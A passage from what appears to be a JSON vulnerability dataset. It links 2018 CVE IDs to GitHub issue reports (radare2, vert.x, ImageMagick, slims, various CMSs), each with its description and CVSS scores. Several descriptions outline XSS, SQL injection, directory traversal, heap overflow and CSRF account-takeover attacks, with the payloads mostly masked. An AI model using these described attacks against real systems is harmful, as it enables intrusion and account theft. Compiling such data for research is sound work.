PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG b8 in APITAG (this NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG ccb0) at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG ccb0, APITAG NUMBERTAG at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cc2f NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG in _start () APITAG URLTAG",
  20796. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20797. "severity": "HIGH",
  20798. "baseScore": 8.8,
  20799. "impactScore": 5.9,
  20800. "exploitabilityScore": 2.8
  20801. },
  20802. {
  20803. "CVE_ID": "CVE-2018-12272",
  20804. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/148",
  20805. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/148",
  20806. "Repo_new": "ximdex/xcms",
  20807. "Issue_Created_At": "2018-06-12T02:28:07Z",
  20808. "description": "XSS in parameter content . vulnerability url: FILETAG parameter content payload: APITAG FILETAG",
  20809. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20810. "severity": "MEDIUM",
  20811. "baseScore": 6.1,
  20812. "impactScore": 2.7,
  20813. "exploitabilityScore": 2.8
  20814. },
  20815. {
  20816. "CVE_ID": "CVE-2018-12273",
  20817. "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/149",
  20818. "Issue_Url_new": "https://github.com/ximdex/xcms/issues/149",
  20819. "Repo_new": "ximdex/xcms",
  20820. "Issue_Created_At": "2018-06-12T03:06:45Z",
  20821. "description": "xss vulnerability in two parameters in DMS Demo. vulnerability url: URLTAG two parameters: Ciudad APITAG Nombre APITAG result: FILETAG Author: zhihua. EMAILTAG .cn",
  20822. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  20823. "severity": "MEDIUM",
  20824. "baseScore": 6.1,
  20825. "impactScore": 2.7,
  20826. "exploitabilityScore": 2.8
  20827. },
  20828. {
  20829. "CVE_ID": "CVE-2018-12320",
  20830. "Issue_Url_old": "https://github.com/radare/radare2/issues/10293",
  20831. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10293",
  20832. "Repo_new": "radareorg/radare2",
  20833. "Issue_Created_At": "2018-06-08T13:10:06Z",
  20834. "description": "Use after free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior UAF in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20835. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20836. "severity": "HIGH",
  20837. "baseScore": 7.8,
  20838. "impactScore": 5.9,
  20839. "exploitabilityScore": 1.8
  20840. },
  20841. {
  20842. "CVE_ID": "CVE-2018-12321",
  20843. "Issue_Url_old": "https://github.com/radare/radare2/issues/10296",
  20844. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10296",
  20845. "Repo_new": "radareorg/radare2",
  20846. "Issue_Created_At": "2018-06-08T13:17:31Z",
  20847. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20848. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20849. "severity": "HIGH",
  20850. "baseScore": 7.8,
  20851. "impactScore": 5.9,
  20852. "exploitabilityScore": 1.8
  20853. },
  20854. {
  20855. "CVE_ID": "CVE-2018-12322",
  20856. "Issue_Url_old": "https://github.com/radare/radare2/issues/10294",
  20857. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10294",
  20858. "Repo_new": "radareorg/radare2",
  20859. "Issue_Created_At": "2018-06-08T13:13:27Z",
  20860. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | iNES ROM dump | Architecture/bits of the file (mandatory) | NES | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  20861. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20862. "severity": "MEDIUM",
  20863. "baseScore": 5.5,
  20864. "impactScore": 3.6,
  20865. "exploitabilityScore": 1.8
  20866. },
  20867. {
  20868. "CVE_ID": "CVE-2018-12339",
  20869. "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/4",
  20870. "Issue_Url_new": "https://github.com/woider/articlecms/issues/4",
  20871. "Repo_new": "woider/articlecms",
  20872. "Issue_Created_At": "2018-06-13T17:10:13Z",
  20873. "description": "There is an XSS vulnerability that can execute javascript. Sign up and select \"add an article\", insert the payload \" APITAG alert NUMBERTAG APITAG \" in the title and submit. Open index line NUMBERTAG CODETAG",
  20874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  20875. "severity": "MEDIUM",
  20876. "baseScore": 5.4,
  20877. "impactScore": 2.7,
  20878. "exploitabilityScore": 2.3
  20879. },
  20880. {
  20881. "CVE_ID": "CVE-2018-12421",
  20882. "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/211",
  20883. "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/211",
  20884. "Repo_new": "ltb-project/self-service-password",
  20885. "Issue_Created_At": "2018-06-14T05:32:40Z",
  20886. "description": "Force string conversion of input values. To avoid attacks with input values (using arrays or other PHP objects instead of strings), we should force string conversion.",
  20887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20888. "severity": "CRITICAL",
  20889. "baseScore": 9.8,
  20890. "impactScore": 5.9,
  20891. "exploitabilityScore": 3.9
  20892. },
  20893. {
  20894. "CVE_ID": "CVE-2018-12421",
  20895. "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/209",
  20896. "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/209",
  20897. "Repo_new": "ltb-project/self-service-password",
  20898. "Issue_Created_At": "2018-06-13T15:42:07Z",
  20899. "description": "Check ldap_bind return code instead of relying on ldap_errno. As can be seen in the issue opened on APITAG the ldap_errno is not filled if there was an error when calling ldap_bind: CVETAG We have a PR NUMBERTAG that works around this by checking that parameters are strings, but this does not prevent other ldap_bind errors. We need to check the ldap_bind return code before looking at ldap_errno.",
  20900. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20901. "severity": "CRITICAL",
  20902. "baseScore": 9.8,
  20903. "impactScore": 5.9,
  20904. "exploitabilityScore": 3.9
  20905. },
  20906. {
  20907. "CVE_ID": "CVE-2018-12423",
  20908. "Issue_Url_old": "https://github.com/matrix-org/matrix-doc/issues/1304",
  20909. "Issue_Url_new": "https://github.com/matrix-org/matrix-spec-proposals/issues/1304",
  20910. "Repo_new": "matrix-org/matrix-spec-proposals",
  20911. "Issue_Created_At": "2018-06-14T09:12:44Z",
  20912. "description": "Proposal to simplify the auth rules of m. APITAG events.. Documentation: URLTAG Author: MENTIONTAG MENTIONTAG Date NUMBERTAG Fixes URLTAG",
  20913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  20914. "severity": "HIGH",
  20915. "baseScore": 7.5,
  20916. "impactScore": 3.6,
  20917. "exploitabilityScore": 3.9
  20918. },
  20919. {
  20920. "CVE_ID": "CVE-2018-12447",
  20921. "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/2",
  20922. "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/2",
  20923. "Repo_new": "ebel34/bpg-web-encoder",
  20924. "Issue_Created_At": "2018-06-15T03:13:29Z",
  20925. "description": "a heap overflow bug which could lead to code execution in libbpg. a heap overflow bug which could lead to code execution in libbpg: integer overflow at APITAG CODETAG after adding a negative number the src pointer will point somewhere before the mmaped area, therefore we can write anything before the mmaped area; there is libc before it, so if we can control the added value, we can gain code execution. summary: integer overflow at the function restore_tqb_pixels of hevc_filter.c execute method: ./bpgdec poc o /dev/null asan URLTAG poc URLTAG",
  20926. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  20927. "severity": "HIGH",
  20928. "baseScore": 8.8,
  20929. "impactScore": 5.9,
  20930. "exploitabilityScore": 2.8
  20931. },
  20932. {
  20933. "CVE_ID": "CVE-2018-12493",
  20934. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/12",
  20935. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/12",
  20936. "Repo_new": "sanluan/publiccms",
  20937. "Issue_Created_At": "2018-06-15T02:34:32Z",
  20938. "description": "There is a APITAG Traversal\" and APITAG file read\" vulnerability that can read system dirs and files. First you should log in with the demo account. Directory Traversal POC: CODETAG Arbitrary file read POC: CODETAG You can use these two PoCs to browse system directories and read any file~",
  20939. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  20940. "severity": "MEDIUM",
  20941. "baseScore": 6.5,
  20942. "impactScore": 3.6,
  20943. "exploitabilityScore": 2.8
  20944. },
  20945. {
  20946. "CVE_ID": "CVE-2018-12498",
  20947. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/26",
  20948. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/26",
  20949. "Repo_new": "idreamsoft/iCMS",
  20950. "Issue_Created_At": "2018-06-14T08:09:18Z",
  20951. "description": "ICMS NUMBERTAG has a SQLi in FILETAG . POC: APITAG POST: APITAG and APITAG Vulnerability file: PATHTAG ERRORTAG iCMS MENTIONTAG set poid APITAG id CODETAG iCMS MENTIONTAG set rid APITAG id CODETAG iCMS MENTIONTAG set cid APITAG id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id CODETAG The $id parameter is passed into the SQL query without any filtering, resulting in SQL injection.",
  20952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20953. "severity": "CRITICAL",
  20954. "baseScore": 9.8,
  20955. "impactScore": 5.9,
  20956. "exploitabilityScore": 3.9
  20957. },
  20958. {
  20959. "CVE_ID": "CVE-2018-12537",
  20960. "Issue_Url_old": "https://github.com/eclipse/vert.x/issues/2470",
  20961. "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2470",
  20962. "Repo_new": "eclipse-vertx/vert.x",
  20963. "Issue_Created_At": "2018-05-23T10:31:39Z",
  20964. "description": "Http header validation. motivation Currently APITAG and APITAG don't check whether a header name or value contains APITAG or APITAG chars. Of course developers are fully responsible for the http headers they set, and such an incorrect value is likely unintended. Forbidding it prevents HTTP header injection for applications that omit to check headers. change throw an ERRORTAG when a header name or value contains an APITAG or APITAG char",
  20965. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  20966. "severity": "MEDIUM",
  20967. "baseScore": 5.3,
  20968. "impactScore": 1.4,
  20969. "exploitabilityScore": 3.9
  20970. },
  20971. {
  20972. "CVE_ID": "CVE-2018-12541",
  20973. "Issue_Url_old": "https://github.com/eclipse-vertx/vert.x/issues/2648",
  20974. "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2648",
  20975. "Repo_new": "eclipse-vertx/vert.x",
  20976. "Issue_Created_At": "2018-10-03T07:02:03Z",
  20977. "description": "APITAG upgrade request body limit. CVETAG : The APITAG HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory (so an oversized request can exhaust server memory). There should be a reasonable limit NUMBERTAG bytes) above which the APITAG gets an HTTP response with the NUMBERTAG status code and the connection gets closed.",
  20978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  20979. "severity": "MEDIUM",
  20980. "baseScore": 6.5,
  20981. "impactScore": 3.6,
  20982. "exploitabilityScore": 2.8
  20983. },
  20984. {
  20985. "CVE_ID": "CVE-2018-12542",
  20986. "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1025",
  20987. "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1025",
  20988. "Repo_new": "vert-x3/vertx-web",
  20989. "Issue_Created_At": "2018-10-03T07:06:09Z",
  20990. "description": "Neutralize property backward slashes sequences in APITAG CVETAG : The APITAG uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\\' (backslash) sequences that can resolve to a location outside of that directory when running on Windows operating systems. This was reported by Vishwanath Viraktamath < EMAILTAG >",
  20991. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  20992. "severity": "CRITICAL",
  20993. "baseScore": 9.8,
  20994. "impactScore": 5.9,
  20995. "exploitabilityScore": 3.9
  20996. },
  20997. {
  20998. "CVE_ID": "CVE-2018-12544",
  20999. "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1021",
  21000. "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1021",
  21001. "Repo_new": "vert-x3/vertx-web",
  21002. "Issue_Created_At": "2018-09-27T12:55:43Z",
  21003. "description": "Potential XXE vulnerability in vertx web. Version vert.x web: APITAG Mitigation Follow the OWASP guide below which provides concise information to prevent this vulnerability. URLTAG",
  21004. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21005. "severity": "CRITICAL",
  21006. "baseScore": 9.8,
  21007. "impactScore": 5.9,
  21008. "exploitabilityScore": 3.9
  21009. },
  21010. {
  21011. "CVE_ID": "CVE-2018-12578",
  21012. "Issue_Url_old": "https://github.com/pts/sam2p/issues/39",
  21013. "Issue_Url_new": "https://github.com/pts/sam2p/issues/39",
  21014. "Repo_new": "pts/sam2p",
  21015. "Issue_Created_At": "2018-06-19T11:47:25Z",
  21016. "description": "heap buffer overflow in bmp_compress1_row. Description of problem: There is a heap buffer overflow in bmp_compress1_row. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below (with asan): ERRORTAG This is a brief description, I will update it. Found by pwd MENTIONTAG",
  21017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21018. "severity": "CRITICAL",
  21019. "baseScore": 9.8,
  21020. "impactScore": 5.9,
  21021. "exploitabilityScore": 3.9
  21022. },
  21023. {
  21024. "CVE_ID": "CVE-2018-12582",
  21025. "Issue_Url_old": "https://github.com/p8w/akcms/issues/1",
  21026. "Issue_Url_new": "https://github.com/git-hash/akcms/issues/1",
  21027. "Repo_new": "git-hash/akcms",
  21028. "Issue_Created_At": "2018-06-25T15:07:50Z",
  21029. "description": "CSRF that can add an admin by submitting this form.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  21030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21031. "severity": "HIGH",
  21032. "baseScore": 8.8,
  21033. "impactScore": 5.9,
  21034. "exploitabilityScore": 2.8
  21035. },
  21036. {
  21037. "CVE_ID": "CVE-2018-12583",
  21038. "Issue_Url_old": "https://github.com/p8w/akcms/issues/2",
  21039. "Issue_Url_new": "https://github.com/git-hash/akcms/issues/2",
  21040. "Repo_new": "git-hash/akcms",
  21041. "Issue_Created_At": "2018-06-25T15:13:58Z",
  21042. "description": "CSRF that can delete an article if the user clicks 'submit'.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  21043. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  21044. "severity": "MEDIUM",
  21045. "baseScore": 6.5,
  21046. "impactScore": 3.6,
  21047. "exploitabilityScore": 2.8
  21048. },
  21049. {
  21050. "CVE_ID": "CVE-2018-12588",
  21051. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3805",
  21052. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3805",
  21053. "Repo_new": "pkp/pkp-lib",
  21054. "Issue_Created_At": "2018-06-18T16:02:58Z",
  21055. "description": "Correct missing escaping in APITAG",
  21056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21057. "severity": "MEDIUM",
  21058. "baseScore": 6.1,
  21059. "impactScore": 2.7,
  21060. "exploitabilityScore": 2.8
  21061. },
  21062. {
  21063. "CVE_ID": "CVE-2018-12599",
  21064. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1177",
  21065. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1177",
  21066. "Repo_new": "imagemagick/imagemagick",
  21067. "Issue_Created_At": "2018-06-19T13:39:47Z",
  21068. "description": "out of bounds write in bmp.c. Prerequisites [x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Steps to Reproduce In coders/bmp.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG which will cause an out of bounds write bug in line NUMBERTAG of coders/bmp.c To reproduce this problem: ERRORTAG Debugging information: ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
  21069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21070. "severity": "HIGH",
  21071. "baseScore": 8.8,
  21072. "impactScore": 5.9,
  21073. "exploitabilityScore": 2.8
  21074. },
  21075. {
  21076. "CVE_ID": "CVE-2018-12601",
  21077. "Issue_Url_old": "https://github.com/pts/sam2p/issues/41",
  21078. "Issue_Url_new": "https://github.com/pts/sam2p/issues/41",
  21079. "Repo_new": "pts/sam2p",
  21080. "Issue_Created_At": "2018-06-20T07:30:42Z",
  21081. "description": "heap buffer overflow in function APITAG Description of problem: There is a heap buffer overflow in function APITAG input tga.ci line NUMBERTAG from debug info) Version Release number of selected component (if applicable): sam2p NUMBERTAG The output information is as follows (with asan): ERRORTAG This is a brief description, I will update it. Found by APITAG",
  21082. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21083. "severity": "CRITICAL",
  21084. "baseScore": 9.8,
  21085. "impactScore": 5.9,
  21086. "exploitabilityScore": 3.9
  21087. },
  21088. {
  21089. "CVE_ID": "CVE-2018-12604",
  21090. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/110",
  21091. "Issue_Url_new": "https://github.com/greencms/greencms/issues/110",
  21092. "Repo_new": "greencms/greencms",
  21093. "Issue_Created_At": "2018-06-20T09:19:06Z",
  21094. "description": "APITAG \u6f0f\u6d1e\u53d1\u73b0\u8005\uff1avr_system \u6076\u610f\u653b\u51fb\u8005\u53ef\u4ee5\u4e0b\u8f7d\u7f51\u7ad9\u5168\u90e8\u65e5\u5fd7\u3002 \u6d4b\u8bd5\u5730\u5740\uff1a FILETAG \u6848\u4f8b\u5730\u5740\uff1a FILETAG PATHTAG \u53ea\u9700\u8981\u5c1d\u8bd5\u731c\u6d4b\u65e5\u5fd7\u7684\u65e5\u671f\uff0c\u5c31\u80fd\u591f\u4e0b\u8f7d\u5168\u90e8\u65e5\u5fd7\u3002 \u9632\u5fa1\u65b9\u6cd5\uff1a\u52a0\u5f3a\u65e5\u5fd7\u540d\u79f0\u7684\u590d\u6742\u7a0b\u5ea6\u3002",
  21095. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21096. "severity": "HIGH",
  21097. "baseScore": 7.5,
  21098. "impactScore": 3.6,
  21099. "exploitabilityScore": 3.9
  21100. },
  21101. {
  21102. "CVE_ID": "CVE-2018-12655",
  21103. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/99",
  21104. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/99",
  21105. "Repo_new": "slims/slims8_akasia",
  21106. "Issue_Created_At": "2018-06-21T03:44:53Z",
  21107. "description": "FILETAG FILETAG",
  21108. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21109. "severity": "MEDIUM",
  21110. "baseScore": 6.1,
  21111. "impactScore": 2.7,
  21112. "exploitabilityScore": 2.8
  21113. },
  21114. {
  21115. "CVE_ID": "CVE-2018-12656",
  21116. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/100",
  21117. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/100",
  21118. "Repo_new": "slims/slims8_akasia",
  21119. "Issue_Created_At": "2018-06-21T03:49:12Z",
  21120. "description": "FILETAG FILETAG",
  21121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21122. "severity": "MEDIUM",
  21123. "baseScore": 6.1,
  21124. "impactScore": 2.7,
  21125. "exploitabilityScore": 2.8
  21126. },
  21127. {
  21128. "CVE_ID": "CVE-2018-12657",
  21129. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/101",
  21130. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/101",
  21131. "Repo_new": "slims/slims8_akasia",
  21132. "Issue_Created_At": "2018-06-21T03:56:19Z",
  21133. "description": "FILETAG FILETAG",
  21134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21135. "severity": "MEDIUM",
  21136. "baseScore": 6.1,
  21137. "impactScore": 2.7,
  21138. "exploitabilityScore": 2.8
  21139. },
  21140. {
  21141. "CVE_ID": "CVE-2018-12658",
  21142. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/102",
  21143. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/102",
  21144. "Repo_new": "slims/slims8_akasia",
  21145. "Issue_Created_At": "2018-06-21T04:00:28Z",
  21146. "description": "FILETAG FILETAG",
  21147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21148. "severity": "MEDIUM",
  21149. "baseScore": 6.1,
  21150. "impactScore": 2.7,
  21151. "exploitabilityScore": 2.8
  21152. },
  21153. {
  21154. "CVE_ID": "CVE-2018-12659",
  21155. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/103",
  21156. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/103",
  21157. "Repo_new": "slims/slims8_akasia",
  21158. "Issue_Created_At": "2018-06-21T04:28:03Z",
  21159. "description": "FILETAG NUMBERTAG Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Sehingga dapat dibuat exploit sebagai berikut ERRORTAG NUMBERTAG Simpan script exploit diatas sebagai html file NUMBERTAG Kirimkan FILETAG kepada korban yang sedang login pada slims miliknya. FILETAG NUMBERTAG Berikut ini merupakan respon dari hasil perubahan data admin. FILETAG NUMBERTAG Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan username : admin password : faisal",
  21160. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21161. "severity": "HIGH",
  21162. "baseScore": 8.8,
  21163. "impactScore": 5.9,
  21164. "exploitabilityScore": 2.8
  21165. },
  21166. {
  21167. "CVE_ID": "CVE-2018-12679",
  21168. "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon3/issues/16",
  21169. "Issue_Url_new": "https://github.com/tanganelli/coapthon3/issues/16",
  21170. "Repo_new": "tanganelli/coapthon3",
  21171. "Issue_Created_At": "2018-12-27T14:18:24Z",
  21172. "description": "Denial of Service vulnerability caused by improper exception handling while parsing of APITAG messages . Multiple sample applications from APITAG library are vulnerable to Denial of Service attacks caused by maliciously crafted APITAG messages. Method APITAG improperly handle multiple exception types leading to crash of applications (including standard APITAG server, APITAG client, example collect APITAG server and client). Example payloads and unhandled exceptions NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in decode return APITAG errors, True) ERRORTAG 'utf8' codec can't decode byte NUMBERTAG fd in position NUMBERTAG invalid start byte NUMBERTAG File: ERRORTAG Error message: File PATHTAG line NUMBERTAG in deserialize APITAG = APITAG NUMBERTAG File PATHTAG line NUMBERTAG in token value = str(value) ERRORTAG 'ascii' codec can't encode character u'\\u NUMBERTAG in position NUMBERTAG ordinal not in range NUMBERTAG Proposed CVSS score: PATHTAG NUMBERTAG High) Mitigation: All exception types should be handled in the main loop of APITAG applications (including standard APITAG server, APITAG client, example collect APITAG server and client), to provide uninterruptible service. FILETAG Issue was reported via email on NUMBERTAG th of February to APITAG developers and registered in CVE database (reserved id is: CVETAG ).",
  21173. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21174. "severity": "HIGH",
  21175. "baseScore": 7.5,
  21176. "impactScore": 3.6,
  21177. "exploitabilityScore": 3.9
  21178. },
  21179. {
  21180. "CVE_ID": "CVE-2018-12684",
  21181. "Issue_Url_old": "https://github.com/civetweb/civetweb/issues/633",
  21182. "Issue_Url_new": "https://github.com/civetweb/civetweb/issues/633",
  21183. "Repo_new": "civetweb/civetweb",
  21184. "Issue_Created_At": "2018-06-15T06:30:26Z",
  21185. "description": "Need an email address to report NUMBERTAG ulnerabilities we've found. Hello, during security auditing of other product that use your library, we have found NUMBERTAG ulnerabilities in civetweb and want to report them to you NUMBERTAG of them is considered to be fatal NUMBERTAG remote memory reveal NUMBERTAG remote code execution) so we want to report by email. We've found this line in PATHTAG \" In case you think you found a security issue that should be evaluated and fixed before public disclosure, feel free to write an email. \u201c But I couldn't find any email address in the docs, would you please offer your email address so we can send the detailed report to you? Thank you. Tencent Blade Team",
  21186. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  21187. "severity": "HIGH",
  21188. "baseScore": 7.1,
  21189. "impactScore": 5.2,
  21190. "exploitabilityScore": 1.8
  21191. },
  21192. {
  21193. "CVE_ID": "CVE-2018-12687",
  21194. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/84",
  21195. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/84",
  21196. "Repo_new": "syoyo/tinyexr",
  21197. "Issue_Created_At": "2018-06-22T13:46:12Z",
  21198. "description": "Assert failure. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a assert failure problem is triggered in APITAG test_tinyexr: APITAG bool APITAG char , const int , const unsigned char , size_t, int, int, int, int, int, int, int, int, size_t, size_t, const APITAG , size_t, const APITAG , const std::vector<long unsigned int>&): Assertion `ret' failed. Aborted",
  21199. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21200. "severity": "HIGH",
  21201. "baseScore": 7.5,
  21202. "impactScore": 3.6,
  21203. "exploitabilityScore": 3.9
  21204. },
  21205. {
  21206. "CVE_ID": "CVE-2018-12688",
  21207. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/83",
  21208. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/83",
  21209. "Repo_new": "syoyo/tinyexr",
  21210. "Issue_Created_At": "2018-06-22T13:45:49Z",
